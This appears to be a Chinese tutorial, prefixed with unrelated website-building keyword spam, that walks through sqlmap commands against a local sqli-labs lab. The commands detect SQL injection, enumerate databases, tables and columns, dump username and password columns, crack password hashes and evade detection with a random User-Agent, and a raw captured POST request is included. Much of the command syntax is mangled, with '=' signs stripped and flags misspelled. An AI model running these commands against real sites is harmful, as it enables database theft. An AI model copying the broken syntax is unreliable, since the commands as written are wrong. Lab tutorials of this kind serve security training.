门户网站建设 工具,启动互联全网营销推广,网站建设公司广告语,网站建设视频教程 百度云本文用的是kali自带的sqlmap工具 我们通过常用命令来理解sqlmap的基本使用 目录 检测注入 获取敏感信息 获取表 获取表的字段 获取数据 --technique 使用指定的注入方式 使用基于时间的延时注入 支持多种注入检测 默认是全部 注入时使用随机的 HTTP User-Agent 设置超时时间 读…本文用的是kali自带的sqlmap工具 我们通过常用命令来理解sqlmap的基本使用 目录 检测注入 获取敏感信息 获取表 获取表的字段 获取数据 --technique 使用指定的注入方式 使用基于时间的延时注入 支持多种注入检测 默认是全部 注入时使用随机的 HTTP User-Agent 设置超时时间 读取文本进行SQL注入检测 检测注入
sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 -dbms mysql -v 1 -batch-u 检测的url 双引号 表示这是一段字符串
-dbms 指定攻击的数据引擎
-batch 会自动进行默认操作不用进行交互信息 确定
-v 输出信息登记为1 输出信息详细程度级别0-6默认为 1 0只显示Python回源tracebacks错误error和关键criticle)信息。 1同时显示信息(info)和警告信息warning)默认为1 2: 同时显示调试信息debug 3同时显示注入的有效载荷payloads 4同时显示http请求 5同时显示http响应头 6同时显示http响应内容 级别越高信息就越详细根据需求选择合适的输出信息。 获取敏感信息
sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 --dbms mysql --current-user --current-db --is-dba --passwords -v 1 -batch
--current-user 用户连接的用户
--currnet-db 当前库
--is-dba 是否root权限
--passwords 获取数据库的密码 使用这个命令 sqlmap找到密文时会提示你是否进行hash破解 如果需要选择合适的字典。 获取表
sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 --dbms mysql -v 1 -D security --tables
在获取当前库、可以根据库列出表。
-D 指定库
--tables 列出所有表 获取表的字段
sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 --dbms mysql -v 1 -D security -T users --columns
获取某个表的所有字段
-T 指定某个表
--columns 获取字段 获取数据
sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 --dbms mysql -v 1 -D security -T users -C username,password --dump
--dump 是导出数据所有内容
-C username,password 获取字段的内容 --technique 使用指定的注入方式
--technique 参数的值的解释 B:Boolean-basedblindSQLinjection布尔型注入 E:Error-basedSQLinjection报错型注入 U:UNIONquerySQLinjection可联合查询注入 S:StackedqueriesSQLinjection可多语句查询注入 T:Time-basedblindSQLinjection基于时间延迟注入 Q:InlineSQLInjection(内联注入) 使用基于时间的延时注入
sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 --dbms mysql -v 3 -D security --techniqueT 支持多种注入检测 默认是全部
sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 --dbms mysql -v 3 -D security --techniqueBEUT
注入时使用随机的 HTTP User-Agent
sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 --dbms mysql -v 3 -D security --random-agent
设置超时时间
--time-out 这个参数是设置超时时间 有得网页响应比较慢可以使用这个参数来增大访问超时的时间。默认是30
sqlmap -u http://192.168.164.1/sqllabs/Less-1/?id1 --dbms mysql -v 3 -D security --timeout10 读取文本进行SQL注入检测
sqlmap -r post.txt --batchPOST /sqllabs/Less-11/ HTTP/1.1
Host: 192.168.164.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: http://192.168.164.1
Connection: close
Referer: http://192.168.164.1/sqllabs/Less-11/
Upgrade-Insecure-Requests: 1uname1passwd1submitSubmit